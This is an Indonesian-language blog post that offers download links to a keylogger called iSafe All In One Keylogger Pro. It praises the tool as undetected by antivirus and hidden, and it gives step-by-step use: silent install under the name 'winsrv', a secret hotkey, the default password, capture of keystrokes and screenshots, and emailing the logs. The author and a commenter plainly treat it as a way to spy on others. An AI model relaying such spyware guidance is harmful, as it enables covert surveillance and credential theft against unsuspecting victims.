Posts Subscribe to This BlogComments

Follow Us


widget

make widget
Please Vote Us
Enter Yahoo Topsites | Yahoo Rare Sites | Yahoo Booter Sites and Vote for this site !!!
Vote For Us
Top Blogs BOOTER-CENTER - Find me on Bloggers.com
Mau Pasang Iklan Disini? Resize Banner 460X61
ads ads ads peluang usaha

Monday, March 12, 2012

iSafe All In One Keylogger Pro 3.5.8

Please Vote Us
Enter Yahoo Topsites | Yahoo Rare Sites | Yahoo Booter Sites and Vote for this site !!!
Vote For Us

Lagi-lagi keylogger..., sebenarnya ini keylogger udah lama sih mungkin udah pada banyak yang tau dan masih banyak sekali yang belum tau. Keylogger iSafe All In One Pro ini beda dengan keylogger lain karena memiliki fitur yang lebih lengkap dibandingkan keylogger lain pada umumnya. Keunggulannya yaitu Tidak terdeteksi oleh anti virus, file terhidden, dan Komplit banget dah namun di TASK MANAGER masih terdeteksi tapi yasudah gak usah dipikirkan karena gak semua orang tau aplikasi ini kok. hehe..


Udah gak usah panjang lebar, langsung aja nih download iSafe All In One Pro nya  Dibawah Ini

Link1
Link2

Cara penggunaannya:
1. Setelah didownload klik 2x aplikasi keyloggernya bernama 'winsrv'.
2. Tunggu sebentar aplikasi ini akan terinstall sendiri dan terhidden langsung.
3. Ketik bersamaan ALT + SHIFT + CTRL + X
4. Akan terbuka tampilan baru kecil di sudut kanan bawah seperti gambar berikut

Ketik '98765' sebagai password.

5. Setelah itu akan keliatan tampilan Keyloggernya

6. Diatas itu hanya password standart bawaan, namun masih bisa diganti kok pada menu setting
7. Jika mau Menjalankan atau berhentikan Keylogger tinggal KLIK Tombol yang ada disudut kiri atas itu pilih ON atau OFF
8. Diatas itu semua secara otomatis akan aktif / ON keyloggernya dan langsung akan mencatat aktifitas kita mulai dari Screen Short, Notepad dll. Semua hasil akan dikirim ke "My Document > iSafe All In One Keylogger Professional Edition 3.5.8 > Keylogger > Log"
9. Nah jika hasil keyloggernya mau dikirim ke email anda, tinggal masuk ke menu SETTING lagi untuk setting email anda.


 10. Pelajari aja setting atau menu yang ada pada keylogger tersebut, gampang banget kok menggunakannya.

SELESAI.....

NB: Jika gambar kurang jelas, arahkan kursor mouse anda pada gambar trus klik kanan pada gambar dan pilih "Open Link in New Tab"

SEMOGA BERHASIL....
O iya lupa, kalau dapat hasilnya bagi-bagi ya... ckckck

Related Post



Get Traffic Like Spam
Loading...

1 Comment:

  • Anonymous

    wuih,,,, om sederhana Tapi kejam nie software,,,,, mantap om ijin sedot sebelom ada yang sedot duluan
    Thx ya Om

  • Post a Comment

    Section meetings - Registered
    recent entries

    users online



    ads ads ads ads
     

    networkedblogs

    B-C ON YAHOO

    Trafic

    Followers

    MyFreeCopyright.com Registered & Protected MyFreeCopyright.com Registered & Protected